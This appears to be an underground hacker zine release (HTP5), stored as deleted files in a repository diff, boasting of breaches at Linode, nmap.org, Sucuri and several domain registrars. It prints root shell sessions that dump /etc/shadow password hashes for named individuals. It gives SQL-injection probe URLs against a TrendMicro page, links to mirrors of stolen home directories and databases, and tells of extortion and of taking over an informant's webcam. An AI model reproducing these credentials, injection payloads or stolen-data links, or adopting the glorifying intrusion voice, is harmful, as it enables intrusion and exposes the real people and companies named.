▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
"I'm positive they owned."
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░
▄▄ ▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄ ▄▄▄▄
██ ██ ███▄██ ██ ██ ██ ██ ██▄▄ HTP5
██ ██ ██ ▀██ ██▄██ ██▄█▀ ██▄▄
██ ▄▄ ▄▄
▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
* Before reading this section of HTP5, we recommend you pop some popcorn.
Following HTP4, we were promptly attacked by the next set of skids looking to
get baked by our terabit DDoS cannon. A group impersonating ac1db1tch3z decided
to take an alternative route, and located us through the development of one of
our botnets, Zodiac. We quickly switched into a fallback network and found out
they used SwiftIRC. SwiftIRC's nameservers were none other than Linode.
Oh by the way, actual AB, was your second backdoor in Unreal that eval() shell
stored in their PHPBB MySQL database? if so -- you've finally been expunged ;)
- HTP
Linode turned out to be safe from our null RDS pass 1day (before Adobe had
released their critical advisory). In the meantime, their registrar (name.com)
was taken out. We acquired their domain login (along with StackOverflow,
DeviantArt, etc.), and prepared a transparent proxy to gather Linode logins.
Speaking of registrars, Xinnet, MelbourneIT, and Moniker - you're all owned.
Back in November, we hinted at Huawei access in our Symantec release. Their
registrar? Xinnet. Total domains owned: about 5.5 million total. No kidding. :P
However, right in time, our very own HTP zeroday research division manifested
subzero.py: a zeroday giving us a direct route into Linode. We proceeded to
breach Linode and acquire their in-memory keys. This allowed us to download
Linode's databases and prepare to backdoor SwiftIRC via the LiSH console+
init=/bin/bash.
Meanwhile, we enjoyed our (root) access to Nmap, Nagios, SQLite, OSTicket,
Phusion Passenger (modrails), Mono Project, Prey Project, Pastie, Sucuri, Hak5,
Pwnie Express, Puppet, and oauth. It got better when we found Jen Emick and
xnite were customers, but that's getting into another story.
Unknown to us at the time, the FBI had successfully accessed HTP. They made
their presence obvious, as everything we would get was burned within a few days.
However, we merely considered it to be a leak, and waited to use Linode itself
to identify the source.
Soon after, the FBI alerted Linode that Nmap was being backdoored, unknowingly
identifying themselves as the source of the leaks within HTP. We still
considered it a leak, and told Linode that if they did not act upon our
already-gained access by 5/1, we would shred all of our Linode-related data.
This included 159,000+ decrypted CCs, usernames, $5 hashed passwords, LiSH
usernames, plaintext LiSH passwords, and employee logins. In the case of
noncompliance, we stated that we would drop it all in our release.
This was actually quite a good offer. We made it because we didn't care about
CCs to begin with (that's directed at everyone on Twitter blaming Linode for
identity theft) and because our primary target was SwiftIRC, not Linode. They
accepted to protect their customer data/CCs (there wasn't much choice).
The FBI got pissed off by this development and forced Linode's hand. After
informing them we would follow through and shred all of our Linode data within a
week, the FBI and Linode coordinated a release detailing the breach in an email
to their customers. We were confused. If they just did this on 5/1, nothing
would be affected? Apparently, the FBI did not trust us. We soon found out
Linode's situation was not voluntary.
Linode was between a rock and a hard place. They had to comply with the FBI
(immediately), but doing so would mean all 159,000+ customers would be on Full
Disclosure by 5/1. Recognizing their situation, we instead told them that if
they acknowledged HTP in their analysis, we'd go ahead and shred their customer
data anyway. Readily enabling carders was never part of our plan. They agreed,
and we proceeded to delete our copies of the data for them.
There was one more loose end to tie. We identified which users on HTP were
involved with the FBI, and promptly gained access to one of their cams. Sure
enough, there was a handler standing behind him, monitoring his involvement
in HTP (hi!).
The FBI lost their access into HTP.
So what's in this release, if not Linode? EDIT: Hahaha we guess that was too
hot, we'll give you guys registrar data instead.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss1.png
|- 193K | Linode blog post screenshot 1
~ http://mirror.hack-the-planet.tv/HTP-5/Linode/ss2.png
|- 179K | Linode blog post screenshot 2
~ http://mirror.hack-the-planet.tv/HTP-5/Linode/registrardata.txt
|- 70K | Data on the registars mentioned above.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

126
htp/HTP5/0x03_Nmap.txt
View file

@ -1,126 +0,0 @@
░░░░
░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░░░
░░░▒▒▒▒░░░░░░░░░░░░▒▒▒▒▒▒░░░
░░▒▒▒▒░░ ░░░▒▒░░▒░░
░░░░░▒░░ ░░▒▒░░░▒░
░░░░░▒░░░ ░░▒░░░░░░
░░░▒░▒░▒░░ ░▒▒░░░░▒░░
░░░░▒▒▒░▓▒░▒░ ░░▒░░░░░░▒░
░░░░░░▓█▓█▓▒░░░ ░░▒░░░░░░░░▒░
░░░░░░▒▓████▓▒▒░░ ░░░▒░░░▒▒▒▒▒░░░░░░░░▒░
░░░░░░░▒▒███▓▓░░░ ░░░░░▒▒░░░▒░▒▒▒▓▓▓▓▒░░░░░░░░▒░░░
░░░░░░▒▒░░░▓█▓▒░▒ ░░░▒░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▒░░░░░░░░░░░
░░░░░░▒▒░▒▒▒░▒▓▒░ ░░▒▒▒░▒▒▒▓▓▓▓▓▓█▓███▓▓▒░░░░░░░░░░░
░░░░░░░░░░▓▓▒▓▒░░░ ░░░▒▒▒▒▒░▒░░▒▒▒▓▓▓████▓▓░░░░░░░░▒▒░
░░░░░░░░▒░▒░░░▒▓▒░░ ░░▒░░░░░▒▒▒▒▒░░░▒▒▓▓▓███▓░░░░░░░░▒░░
░░░░░░░░░░▒▒░░▓█▓▒░ ░░▒▒▒▒░░▒▓▒▒░▒▒▒▒░░░▒░░▒▓▓▓▒░░░░░░▒░░
░░░░░░░░░░░▒░▒▒▓░░░░ ░▒▒▓▓▓▓▓▓▓▓▓█▓▒▒░░░▒▒▒▒░░░▒▒░░░░░░░▒▒░
░░░░░░░░░░░▒░░▒▒▒░░░░░░ ░░░░▓███████████████▓▓▒░▒▒▒▒▒░░▒▒░░░░▒▒░
░░░░░░░░░░░▒▒▒▒░░▒░░░░░░░░░░░▒▓▓███████████████████████▓▓▓▓▒▒░░░░░
░░░░░░░░░░░░░░░▒▒░░░░░░░░░░░░░░░░░▓████████████████████████▓▒▓▒▒▒░
░░░░░░░░░░░░░░░▒▓░▒░░░░░░░░░░░░░░░░▓██████████████████████████▓▓▒▒░
░░░░░░░░░░░░░░░░░░▓▓▒▒░░░░▒░▒░░░░░░░░▒████████████▓▒▒▓█████████▓▓▓░▒░
░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒░▒░░▒▒░░░░░░▒▒░░░░░░░▒▒▓███████▓▓▓▒▒▒▒█████████▓▓▒░▒░
░░░░░░░▓▓▓▒▒▓████████▓▒░░░░░░░▒▒▓▓▓▓░░▒░░░░░░▒▒▓▓▓▓▓▒▒░░░░░▓███████▓▓▓░░░
░░░░░░░░▒▒░░▒▓░▒███████▒░░░░░░░▒▒▓▓▓██▓░░░░░░░░░▒▓▓▒░▒░░▒░░░▒░██████▓▓▓░▒░
░░░░░░░░▒░██▓▓▓░░▓████▒░▒░░░░░░░░█▓▓▓▓▒▒▒▒▒▒▒▒▓▓▒▓▓▓▓▓▒▒░▒░░░▒▒████▓▓▒▒▒░
░░░░░░▒░▒▒█▓▓███▓░░▓█▓░▒▒▓▒▒░░░░▒█▓▓▒░▒░▒▒▒▒▒░░▒░░░▓█████▓███▓▒██▓▓▓▒▒▒░
░░░░░▒▒▓░▒▒▓▓▒▓███▒▒▓▒░░▒██▓░░░░▒██▓▒▒░░░▒▒░░░░░░░░░░▒▓██▓▓░▒▓███▒▓░░░░
░░░░▒▒░▒▓▒▒▒▓▓▒▓███▓░▒░░▒███▓▒░░░▓██▓▒▒░░░░░▒▒░░░░░░░░░▒█▓▓░▒▒▓▓▓▓░▒░
░░░▒▒▒▓▓▓▒▒▒▒░▓▓▒▓███▓▒▒▒▓███▓░░▒▒▓▓▒░▒▒░▒▒▒▓▓▓▓░▒▒▒▓▓▓▒▒▓▒░░▒░▓▓░░░
▒▒▒▓▓▓▓▓▓▒░░▒░▒▒▓░░▓██▓░▒▒▓██▓▓▒▒▓▓░░▒▒░░░▒░▓▓██▒▒▒▓███████▓░▒░▒░░░
░▒░░▒█▓▒▒▒░░▒▒▒░▒▓▒░▒▓█▓▓▒░▓█▓▓█▓▓▒▒░░░▒▒░▒▒▒░▓▓▓▓▓▓▓██▓▓▒▒▓█▒▒░▒░
▒░░▒▒░▒▓░▒▒▒░░▒▒▒▒▓▓▒▒▓██▓▒▒▒▓███▓▓░░░░▒▒▓▓▒░░▒▒███▓▓██▀▀▓▓▓█▓▒▒░
░░░░░▒▒░▒▓▒▒▒░▒░░▒▒▓▓▓▒▓█▓▓▒▒░▓███▓▓▒░░░▒▒▒▓▒▒▓▓████████████▓▒▒░
░▒▒░░░░▒▒▒▒▒░▒░░▒░░▓▓▓▓▓▓█▓▓▒░▒▒██▓██▓▒░░░░░░░▒░▒▒▒▓▓▓█████▓▒▒░
▒▒▒▒▒▒░░░▒░▒▒▒▒░░▒▒▓▓▓▓▓▓████▒▒▒▒▓█████▓▒▒▒▒▒░░░▒░░▒▒▒▓████▒▒░░
░▓▒▓▒▒▒▒░░░▒▒░▒▒░▒▓▓▓▓▓▓▓▓████▓▒░▓▓██▓█████▓▓▓▓▒▒▒▓▓▓▓███▓▒▒░░
░▒▓▓▓▒▒▒▒▒▒▒░▒░▒▒▒▒▓▓▒░▓▓▒▓████▓░▒▓▓█████████████████████▓░░░░
▒░▓░▓▒▒▒▒▒▒░▒░░▒▒▒▓▓▓▓▓░▒▒░▒▓███▓░░▒███████████████████▓░▒░▒░░
▒▓▓▒▓░▒▒▒▒▒▒▒▒▒░░░░▒▓▓▓▓▓▓▓░▒▒▓██▒▒░▓██████████████████▒▒░▒░░░░
▒█▓▓▒▒▒▒▒▒▒▒░▒▒░░▒▒░▒▓▓▓▓▓█▓▒▒▒▓██░▒▓▓████████████████▓▓▒░▒▒▒░░
░▓░░▒░░▒▒▒▒▒▒▒▒░▒▒░▒▒▓▓▓▓████▓▓▓██▓░▓▓▓███████████████▓▓▓░▒░░▒░░
░░▒▒▒░▒░▒▒▒▒▒░▒▒░▒░░▒░▒▓▒▒████▓████▒░█▓███████████████▓▓█▒▒░░░░░░░
░░░░░░▒▒░░░▒▒▒▓▒▒▒▓░▒▒▒▓▓▓█▓▓▓██████░█▓▓██████████████▓██▓▒░░░░░▒░░
░░░░░░▒▒▒▒▒░░▒▒▒░▒▒▒▒░▒▓▓▓▓██▓▓▓▓███▒▓█▓██████████████▒██▓▒▒░▒░▒░▒░░
░░░░░░░░░░░░░░░░░░░░▒▒░░░░▒░░░▒░░▒▒▒▒▓▒▓▓▓██▓▓▓▓▓██▓█▓░▒▒░▒▒░░░░░▒▒░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒░▒▒░▒▒▒▒░░▒▒▒▒░░░░░▒▒░▒▒▓░░░▒▒░░
░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▒░▒▒▒░░░░░░░░░▒▒░░
░░░░░░░░░░
"You have to let it all go. Fear, doubt, and disbelief."
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄ ▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄
███▄ ██ ██▀▄▀██ ██ ██ ██ ██ HTP5
██ ▀█▄██ ██ ▀ ██ ██▀██ ██▀▀
██ ▀██ ██ ██ ██ ██ ██ Whoa. Did we just backdoor Trinity?
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
Access to nmap.org (Insecure) was gained through Linode, which also included
svn.nmap.org and Seclists. Based on our approximations, the FBI went into holy-
shit mode beginning when we were backdooring it. We decided to withhold the
private releases, including DARPA CINDER Nmap, and release to you the unabridged
contents of the /home/ directory including those of Fyodor (Gordon Lyon) and
David Fifield. Before we drop you into nmap.com, though, here's their
/etc/shadow for those curious:
[root@web etc]# cat shadow
root:$1$9e0033fd$9M4AIYi9o1.wcm07WGUTZ0:14746:0:99999:7:::
bin:*:14746:0:99999:7:::
daemon:*:14746:0:99999:7:::
adm:*:14746:0:99999:7:::
lp:*:14746:0:99999:7:::
sync:*:14746:0:99999:7:::
shutdown:*:14746:0:99999:7:::
halt:*:14746:0:99999:7:::
mail:*:14746:0:99999:7:::
news:*:14746:0:99999:7:::
uucp:*:14746:0:99999:7:::
operator:*:14746:0:99999:7:::
games:*:14746:0:99999:7:::
gopher:*:14746:0:99999:7:::
ftp:*:14746:0:99999:7:::
nobody:*:14746:0:99999:7:::
vcsa:!!:14746:0:99999:7:::
ntp:!!:14746::::::
sshd:!!:14746::::::
fyodor:$1$71vbn0Qa$34cy/K1mp8ag4C7I3eXqS/:14782:0:99999:7:::
david:$1$cVie3LDG$WOrypVpCcBl.UyA8TKRX20:14783:0:99999:7:::
xfs:!!:14782::::::
apache:!!:14782::::::
web:!!:14782:0:99999:7:::
postfix:!!:14782::::::
webalizer:!!:14783::::::
mysql:!!:14896::::::
postgres:!!:14897::::::
distcache:!!:14924::::::
pcap:!!:15615::::::
mailman:!!:15666::::::
Yep, those are $1. We'll give them the benefit of the doubt: Linode used AES.
By the way, Fyodor, thanks for amis-6.01.DARPA1.tar.gz. We'll be sure to give it
a spin.
AMIS - Adversary Mission Identification System
==============================================
The Adversary Mission Identification System (AMIS) is a computer program
that analyzes logs of network scans and reports possible signs of an
adversary mission.
The AMIS is designed to work with the logs produced by the Nmap Security
Scanner. It is part of an overall defensive system that includes
periodic scans and their analysis.
The AMIS checks for these "tells" that may be signs of an insider
mission:
* Newly opened ports, particularly those of file servers (e.g. HTTP,
FTP, and P2P services).
* Differences in files shared by known file servers, including new
files, deleted files, and changes in file metadata.
* Security vulnerabilities in servers.
Enjoy this section of HTP5.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Nmap/home.tgz
|- 16GB | Nmap.org: /home/
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄

110
htp/HTP5/0x04_Sucuri.txt
View file

@ -1,110 +0,0 @@
▄▄▄▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄ ▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄
██ ██ ██ ██ ██ ██ ██▄▄█ ██ HTP5
██▄▄▄▄▄▄ ██▄▄██ ██▄▄▄ ██▄▄██ ██ ▀▄▄▄▄▄██▄▄▄
██
▄▄▄████████▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
"Sucuri is a company that offers a security service that detects unauthorized
changes to network (cloud) assets, including web sites, DNS, Whois records, SSL
certificates and others. It is also heavily used as an early warning system to
detect Malware, Spam and other security issues on web sites and DNS hijacking."
Sucuri, why didn't you announce that you got owned? Pretty useless warning
system, if you ask us.
[root@sucuri www]# uname -a
Linux sucuri.net 2.6.39.1-linode34 #1 SMP Tue Jun 21 10:29:24 EDT 2011 i686 i686
i386 GNU/Linux
2001, here we come
[root@sucuri www]# cat /etc/shadow
root:iFvywDsrRwmjI:15755:0:99999:7:::
bin:*:14746:0:99999:7:::
daemon:*:14746:0:99999:7:::
adm:*:14746:0:99999:7:::
lp:*:14746:0:99999:7:::
sync:*:14746:0:99999:7:::
shutdown:*:14746:0:99999:7:::
halt:*:14746:0:99999:7:::
mail:*:14746:0:99999:7:::
news:*:14746:0:99999:7:::
uucp:*:14746:0:99999:7:::
operator:*:14746:0:99999:7:::
games:*:14746:0:99999:7:::
gopher:*:14746:0:99999:7:::
ftp:*:14746:0:99999:7:::
nobody:*:14746:0:99999:7:::
vcsa:!!:14746:0:99999:7:::
ntp:!!:14746::::::
sshd:!!:14746::::::
dre:mAuUxgVOcOeAE:15678:0:99999:7:::
apache:!!:14898::::::
mysql:!!:14898::::::
mailnull:!!:14946::::::
smmsp:!!:14946::::::
ossec:!!:15461:0:99999:7:::
^ OSSEC? Here, We're sure you'll get a kick out of this:
TrendMicro (owns OSSEC) DB access via SQLi:
http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=5
http://www.trendmicro.com/download/eula/agreement.asp?id=40993%20and%205=4
Included in this segment of HTP5 are the databases of Sucuri's primary site,
though labs.sucuri.net and the rest of their VPS's were also compromised.
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
~ http://mirror.hack-the-planet.tv/HTP-5/Sucuri/dbs.tgz
|- 2.1MB | Sucuri WP DB's
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
"GREGORY D. EVANS, BABY! NUMBA 1!"
░░░▒▒▒▒░░░░░░░
░░▒▒▒▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░
░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒▒░░
░▒▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▒▒▒▒▒▒▒▒▒░
░▒▒▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▒▒▒▓▓▒▒▒▒▒
▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒░
▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒▒▒
▒▒▒▒▒▒▒▒░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒
▒▒▒▒▒▒▒░░░░░░ ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒
░▒▒▒▒▒▒░░░░░░░ ░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒
▒▒▒▒▒▒▒░░░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓░
▒▒▒▒▒▒▒▒░░░░░░░░ ░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒
░▒▒▒▒▒▒▒▒░░░░░░░░░ ░░░░░░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓░
▒▒▒▒▒▒▒░░░░░░ ░░ ░░░ ░░░▒▒▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓░
▒▒▒▒▒▒▒░░░░░░ ░░░░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓░
░▒▒▓▓▒▒▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▒▒
░▒▓▓▓▓▓▓▓▓▓▓▒▒▒▒░░░░▒▒▓▓▓▓▓▓▒▒░▒▒▓▓▓▓▓▓▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▒
▓▓▓▒▓▓▓▓▓▓▓▓▓▓▒▒░░░░▒▓▓▓▓▓▓▒▓▄▓▓▓▓▓▓▓▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓░
▒▓▓▓▓▓░▒▒▓▓▓▓▓▓▒░ ░▒▒▒▒▒▒▒░░▒▒▒▒▓▓▒▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▒▒▒░
▒▒▓▓▓▓▄▓▓▓░░▒▒▒▒░ ░░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▒▒▒▒▒▒▓▓▓▓▓▒░▒░
▒▒▒▓▓▓▒▒▓▒▒░░▒▒▒░░░░░░░░░░░░░░░░░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▒▒▒░
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░░░░░░░░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▒▒▓░
▒▒▒▒▒▒▒░░░░▒▒░░░ ░░░░░▒▒▒▒░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓░ ▒
▒▒▒░░░░░░░░▒░░░░ ░░ ░░▒▒▓▒▒▒▒░░ ░░▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▒▒
▒░░░░░░░░░▒▒▒▒▒░░▒▒▓▓▓▓▓▓░░░░▒▒░░░░░▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓▓
▒▒░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▒░░░░▒▒▒░▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒
▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▒▓▒▒▒▒▒▒▒▒▓▓▓▓▒▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▒
▒▒▒▒▒▒░░▒▒▓▓▓▓▒▒▒░░░░░▒▒▒▒▒▓▓▓▓▓▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓█████▓▓▒
▒▒▒▒▒▒▒▓▓▓▒▒▓▓▒▒▒░░░░░░▒▒▓▓▓▒▒▒▓▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▒███████▓▓▒▒
▓▓▓▓▓▓▓▓▓▓▓▓▓▒░ ░░▒▒▒░░░▒▒▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓░░▓█████████▓▓▓▒
▓▓▓▓▓▓▓▓▒▓▓▒▒░ ░░░░░░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓ ▒██████████████
▓▓▓▓▒▒▒▒▒▒▒░░░ ░░▒▒▒░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▒ ▓██████████████
▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓░ ░▓██████████████
▓▓▓▓▓▒▒▒▒▒▒▒▒▒▒░░░░░░░▒▒▒▓▓▓▓▓▓▓▓▓▓▓░ ▓▓██████████████
▓▓▓▓▒▒▒▒░░░░░░░░░░░▒▒▓▓▓▓█▓▓▓▓▓▓░ ▒▓███████████████
▓▓▓█▓▓▓▒▒▒▒░░░░░░░░▒▒▓▓▓▓▓█▓▓▓▓▒░ ░▓▓███████████████
▓▓▓███████▓▓▓▓▓▓▓▒▓▓▒▓▓▓▓▓▓██▓▓▓▓▒ ░▓▓████████████████
▓▓████████████▒▒▓▓▓▓▓▓▓▓▓▓████▓▓▓▒░ ▓▓█████████████████
▓▓▓███████████████▓ ░▒▓▓▓██████▓▓▓▒ ▓▓██████████████████
▓▓▓████████████████████▒ ░▒▓▓▓██▓▒ ▓▓███████████████████
▓▓▓███████████████████████▓░ ░▓▒ ▒▓▓███████████████████
▓▓▓▓███████████████████████████▒ ▓▓▓ ▒▓█████████████████████
▓██████████████████████████████▓░ ▓▓▓▓▒ ░▓▓█████████████████████
███████████████████████████████▓░ ▓▓▓▓▓░▓░ ▓▓▓█████████████████████
███████████████████████████████▓ ░▓▓▒▒▓▒▓▓▒ ▓▓▓██████████████████████
███████████████████████████████░ ▒▓▒▒░▓▓▓░ ▒▓▓███████████████████████
███████████████████████████████▒ ▓▓▒░░▓▓░ ░▓▓████████████████████████
███████████████████████████████▒ ░▒▒▒▓▓▓▓▒ ░▓▓█████████████████████████
██████████████████████████████▓▓ ░▒▓▒▓▓▓▒▒▒ ▓▓██████████████████████████
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀

95
htp/HTP5/0x05_NVD.txt
View file

@ -1,95 +0,0 @@
▄▄ ▄▄ ▄ ▄▄▄▄ ▄▄▄▄▄ ▄▄ ▄▄ ▄ ▄ ▄▄▄
███▄ ██ █ █▄▄▄ █ ▄▄▄ ███▄ ██ █ █ █ █ HTP5
██ ▀█▄██ █ ▄▄▄█ █ ██ ▀█▄██ ▀▄▀ █▄▄▀
██ ▀██ ██ ▀██
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
GILL
However, we have come to believe that one 'HTP'
is involved in the NVD breach. They or perhaps
an accomplice of theirs have a disk that Mr.
Belford needs. We want you to help us find it.
\
░░▒▒▓▓▓▓▓▓▓▓▓▒▒░░
░▒▓███████████████████▓▒░
░▒▓█████████████████████████▓▒░
░▓████████▓▓▒▒▒▒▒▒▒▒▒▒▓▓▓▓▓▓█████▓
░▓█████▓▓▓▓▒▒▒░░░░░░░░░░▒▒▒▒▒▓▓▓███▓
░▓████▓▓▓▒▒▒▒▒▒▒░░░░ ░░░░░▒▒▓▓▓██▓
▓████▓▓▒▒▒▒▒▒░░░░ ░░▒▒▒▓▓▓██▒
▒████▓▓▓▒▒▒▒▒░░░ ░▒▒▒▓▓▓██
▓████▓▓▒▒▒▒▒▒░░░ ░░▒▒▒▓▓▓█░
█████▓▓▒▒▒▒▒░░░ ░░▒▒▒▓▓█▒
████▓▓▒▒▒▒▒▒▒▒▒░░ ░░▒▒▒▒▓▓▓▓
███▓▓▒▒▒▒▒▒▒░░░ ░░░░▒▒▒▓▓▓▓
▓█▓▓▓▒▒▒▒▒▒▓▓▓▓▓▓▓▓▓▓▄░ ░▄▓▓▓▓▓▓▓▓▓█▓▓▓
▓▓▓▓▓▓▓▓▓▓█▓▓▓▓▓▓▓▓▓▓▓█▒▓▒▓▒▓▓▓▓▓▓▓▓▓▓█▓█░
▒▓▓▓▓▒▒░░▒█▓▓▓▓▓▓▓▓▓▓█░▒░░▒▓▓▓▓▓▓▓▓▓▓▓█▓▓
░▒▓▓▒▒▒▒░░▒▒█▓▓▓▓▓▓▓▓▓█░▒░░░▒▓▓▓▓▓▓▓▓▓▓█▒▓░
▒▒▒▒▒▒▒▒▒▒▒░░▀▀▀▀▀▀▀ ░▒░░ ░▒▒▒▀▀▀▀▀▀▒▓▓▓▒
░▒▒▒▒▒▒▒▒▒░░ ░░░ ░░▒ ░░▒▒▒▓
▒▒▒▒▒▒▒▒▒▒▒░ ░░░░░ ░░░░░ ░░▒▓▒
░▒▒▒▒▒▒▒▒▒░ ░░░░░ ░▒░░░ ░▒▒▓
░▒▒▒▒▒▒▒▒░░░░ ░░░░▒▒▒▒░░░░░▓▓▒░░ ░░░▒▓▓
░░▒▒▒▒▒▒░░░░░░▒▒▓▒░░░░░░░░░░░▒▓▓▓▒░░▒▒▓▓▓░
